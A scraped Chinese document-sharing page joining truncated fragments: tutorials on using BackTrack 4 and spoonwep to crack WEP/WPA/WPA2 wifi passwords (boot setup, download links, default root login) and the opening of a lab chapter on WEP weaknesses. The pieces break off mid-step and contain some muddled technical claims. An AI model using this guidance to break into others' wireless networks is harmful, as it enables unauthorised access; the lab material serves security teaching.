“BT4”全称是BackTrack4。实就是个linux系统,和BT3比较,irCrack-NG 1.0 rc2升级为AirCrack-NG 1.0 rc3。在BT3的-2、-3、-4、-5攻击模式下增加了-6、-7攻击模式,破解速度更快集成度更高,同时支持更多的网卡进行注入。BT3不支持的卡可以在BT4下试下。这次就讲讲BT4的使用教程。(注:如果只需破解wep加密的AP,无需使用BT4,BT3即可。但是,WPA,WPA2之类的加密模式,只能在BT4下破解。) BT4的使用方法总共有3种: 1.将BT4下载到U盘当中,适当设置后,将电脑改成U盘启动(开机时进入BIOS设置),重启即可进入BT4界面。(下次更新,请大家自己多关注。) 2.将BT4刻录到光盘中,并将电脑改成光驱启动,重启。(此方法虽然一劳永逸,但是比较伤光驱,所以不推荐。) 上面两种方法都不可避免要,重启电脑,进入另一个系统,好像不是很方便。所以,这次主要讲讲第三种办法: 3.在虚拟机下安装BT4,进行破解。直接虚拟一个linux的系统,无需再重启,就可以在windows系统上进行BT4破解。(值得注意的是,因为虚拟机无法使用你笔记本的内置无线网卡,用这种办法则必须要有一个外置的无线网卡,可以去淘宝上搜:大功率网卡,类型很多,价格也不是很贵。我倒是有一个,约个时间借我的也行。用这个搜索到的信号往往比用自带的强3.4倍,破解之后就可用这个代替自带的网卡上网。如果你不想买,就只能使用前2种办法了。) ——————————————————————————————————————————————————————开始讲解:虚拟机下安装BT4第一步:下载虚拟机和BT4的镜像。(虚拟机VMware,晨光中有的下载。BT4的镜像还没,我下回找个机会上传晨光。) 第二步:打开虚拟机,点击新建虚拟机,如图,选择典型

bt4破解wpa2步骤

bt4破解wpa2步骤 2010-05-21 10:11 BT4全称Back Track four,这是一个linux环境的便携系统,可以放到U盘或者光盘中启动,对本身硬盘没有影响,无需在本地安装 是圈内非常著名的黑客攻击平台,是一个封装好的Linux操作系统,内置大量的网络安全检测工具以及黑客破解软件等。 BT3~4因可以方便的破解无线网络而出名,其中内置的spoonwep是一个非常强悍的图形化破解WEP无线网络密码的工具。 一、既然有系统了, 1.一个U盘启动制作工具就行:unetbootin-windows-356 下载地址:https://www.wendangku.net/doc/d45199927.html,/blog/attachments/month_0906/t2009621225526.rar 2.spoonwep-wpa破解工具用于BT4下的deb安装包 迅雷下载地址:(已经修正下载地址,打开迅雷,然后复制以下地址即 可)thunder://QUFodHRwOi8vbXkueHd0b3AuY29tL2ZpbGVteS8yMDA5MDUxNy82NzljMTNkMi4xLmRlYlpa 二、运行unetbootin制作BT4的U盘启动系统。 点确定就开始制作了。 在这里需要泡杯茶点支烟等一下。 从ISO文件里提取文件拷贝到U盘里需要一段时间。 完成之后,不要重启,再把刚刚下到的“spoonwep-wpa破解工具用于BT4下的deb安装包”手动拷贝到U盘根目录下面,自己记好它好的名字,方便到BT4下找到它。 三、启动BT4 在BIOS里面设置从U盘启动,这个无法截图,自己摸索吧。呵呵~~ 四、进入BT4 登陆的用户名:root,密码:toor startx命令启动图形化界面。 五、安装spoonwep-wpa-rc3.deb包 点击左下角的开始菜单,点击一个叫system mune的弹出菜单,再点击“storeage media”,会打开一个窗口,点击窗口上面有个刷新的按钮,在窗口下面空白的地方会列出你的硬盘和外设,进

WEP密钥破解实验

Lab-7 无线安全之WEP密钥破解 不积跬步,无以至千里

WEP是Wired Equivalent Privacy的简称,WEP安全技术源自于名为RC4的RSA数据加密技术,以满足用户更高层次的网络安全需求。有线等效保密(WEP)协议是对在两台设备间无线传输的数据进行加密的方式,用以防止非法用户窃听或侵入无线网络。不过密码分析学家已经找出WEP 好几个弱点,因此在2003年被Wi-Fi Protected Access (WPA) 淘汰,又在2004年由完整的IEEE 802.11i标准(又称为WPA2)所取代。WEP 虽然有些弱点,但也足以吓阻非专业人士的窥探了。 无线路由器加密方式通常有两种方式加密: ●第一种是WEP密钥加密 ●第二种是WPA密钥加密 本章首先给大家介绍的是WEP密钥加密原理和破解方法以及如何预防WEP 被破解的风险。从攻、守两方面详细给大家介绍WEP详细相关知识。 1.WEP密钥 1.1WEP加密类型 首先,WEP加密采用的是64位和128位加密密钥的方式,密钥为10 个十六进制字符(0-9 和A-F)或 5 个ASCII 字符;对于128 位加密,加密密钥为26 个十六进制字符或13 个ASCII 字符。64 位加密有时称为40 位加密;128 位加密有时称为104 位加密。 1.2WEP加密分析 WEP加密方式使用了RSA开发的RC4 ping算法。全称为有线对等保密(Wired Equivalent Privacy,WEP)是一种数据加密算法。用于提供等同于有线局域网的保护能力。使用了该技术的无线局域网,所有的客户端与无线接入点的数据都会以一个共享的密钥进行加密,密钥的长度有40位至256位两种,密钥越长,黑客就需要更多的时间进行破解。 如图7-1所示,为WEP的数据帧结构说明:

相关文档
相关文档 最新文档